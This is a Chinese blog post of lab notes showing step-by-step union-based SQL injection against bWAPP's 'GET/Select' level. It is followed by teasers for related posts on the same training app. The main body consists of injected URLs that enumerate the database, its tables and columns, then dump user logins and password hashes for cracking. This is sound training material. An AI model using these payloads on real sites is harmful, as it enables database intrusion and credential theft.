SQL Injection (GET/Select)

最新推荐文章于 2024-12-16 18:00:00 发布
最新推荐文章于 2024-12-16 18:00:00 发布
阅读量484 收藏 2
点赞数 1
分类专栏: bWAPP学习笔记 文章标签: sql html web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40554015/article/details/120354687
版权

选项点一点,观察URL,只有movie的值在变化,和GET/Search中的title应该是一样的

 

 

看看类型

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 or 1=1 &action=go

1.查字段数

http://192.168.3.95/bWAPP/sqli_2.php?movie=1 order by 7 &action=go

2.查看可显示字段

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,2,3,4,5,6,7 &action=go

2,3,4,5为可显示字段

 3.爆库

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,database(),3,4,5,6,7 &action=go

库名:bWAPP

4.爆表

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go

发现只爆出来1个表

 用group_concat()把表都拼接起来

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go

这次有5个表了,我们要用users

 5.爆字段

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'&action=go

我们要用 login 和 password

 6.爆字段内容

http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from bWAPP.users &action=go

2个

 7.MD5解密https://www.cmd5.com/

bWAPP练习--injectionSQL Injection (GET/Search)
weixin_38167363的博客
04-09 1074
SQL注入: SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 LOW: 0x01:分析一下网站的...
bWAPP靶场 injection SQL Injection GET/Search
2301_77205899的博客
04-23 467
bWAPP靶场入门 简单sql注入过程 bWAPP靶场 injection SQL Injection GET/Search
webgote的例子(4)Sql注入(SelectGET)
时光凉春衫薄的博客
03-25 249
SQL Injection (Select/GET) 本章内容 (查询显示中要注意的错误) 这里面我们看一下 movie的数值,选择表单中的当我们选择的二个的时候 move的值也变成了第二个,选择表单中第三个第四个的值的时候move的值也相应的进行了改变,通过这个我们不难推出这个查询的结果和move一一对应的关系。 我们不妨再个包看看,get方法请求的路径里面还是将这个值拿到数据库...
sql_injection之基本get注入
aipei5098的博客
04-14 199
1、代码篇 <?php error_reporting(0); include("../conn.php"); if(isset($_GET['id'])){ $id=$_GET['id']; echo "你当前输入id:".$id."<br>"; $sql="select * from user where id='$id' ...
SQL Injection (POST/Select)
qq_40554015的博客
09-17 289
这道题显然还是用burpsuit抓包来看看: movie=2 和上一题不同,这里是数字,猜测换成其他数字就是其他电影,那么怎么换呢? burpsuit抓包后右键发送到Repeater,修改数据再发送就可以了! 修改为3,果然变成了Man of Steel 那就直接在左边修改数据post就可以了 先来看看可显示位: 和前几题真是一模一样! 再来看看库名: 接下来是表名: 然后是字段名: 最后看一看login和pass...
Sql Injection
ivalue的博客
07-26 1203
1:sql 注入:SQL Injection 就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 简单来说,就是让服务器获取到你的恶意sql语句,并且执行。     参考 https://blog.csdn.net/chuan442616909/article/details/58653996 https://www.c...
【bwapp】SQL Injection(GET/Search)——low级别
用博客做做记录的小白
06-13 760
bwapp靶场的sql注入关卡低级难度,采用手工注入和自动化注入两种方式实现sql注入。
【bWAPP】SQL注入实战
最新发布
正是修行时
12-16 1580
我生来就是高山而非溪流 ,我欲于群峰之巅俯视平庸的沟壑。我生来就是人杰而非草芥,我站在伟人之肩藐视卑微的懦夫!
bWAPP中SQL注入思路
qq_37019068的博客
10-09 1473
bWAPP中SQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里我猜想其构成SQL语句的代码: $sql = "select * from table where Title like '%" . $name . "%'" 接下来为了验证猜想,我输入了一个单引号 返回了一个报错,直接证明了服务器未对单引号进行过滤,意味着我们可以使用单引号进行SQL语句的闭合控制,且也
回调函数(CallBack)
行者常至
01-18 1575
需求:选择合同后,带回合同的信息(合同名称,供应商名称,联系人)第一个图为:AddDdSp.html(新增定点商品)第二个图为:SelectDdht.html(选择定点合同)点击“选择”时触发js function xzHtOrGys(obj){ var cgfl = document.getElementById("splb").value; if(cgfl=
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 1081
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
SQL注入原理讲解,很不错!
热门推荐
stilling2006的专栏
01-21 39万+
原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。 网络安全成为了现在互联网的焦点,
Web安全SQL注入漏洞学习(八)-混淆注入
u012002125的博客
10-24 3254
混淆注入的定义与原理 在普通的注入过程中注入动作过于明显,非常容易被识别检测到,此时就需要改变攻击手法,绕过系统的检查与过滤,这就是混淆注入。 混淆注入的实施 使用之前搭建的bWAPP平台进行演示,选择SQL injectionGET/SELECT)漏洞,级别选择中级 首先使用union方式进行注入测试 playload为:http://XX.XX.XXX.XXX:8080/sqli_2.php?movie=1%20union%20select%201,2,3,4,5,6,.
PB GetRow()GetSelectRow(0) 的区别
小树苗不知道
05-05 1万+
从dw中取的选中的行数。 最好是在点击dw时,使用 this.selectrow( 0 , false ) this.selectrow( row , true ) 选中一条行数。 然后在获得dw的行数时,使用dw_1.GetSelectRow(0) 来获得行数。 因为如果使用 getrow() 的话,如果你没有去选择行数,那么getrow()返回的行数就是1,这样很容易出现错误
BWAPP之SQL注入通关
qq_43665434的博客
04-17 3188
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
easyui tree getChecked 和 getSelected,jq[0]的解释
aq23es的博客
06-16 8364
要想获取上图中这些已选的元素,只能用getChecked, getSelected只能单选,不能多选,以下是easyui getChecked源码,多选树时使用 getChecked:function(jq){ return _4f2(jq[0]); /* 使用实例: var t = $('#cc').combotree('tree');       var n = t
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值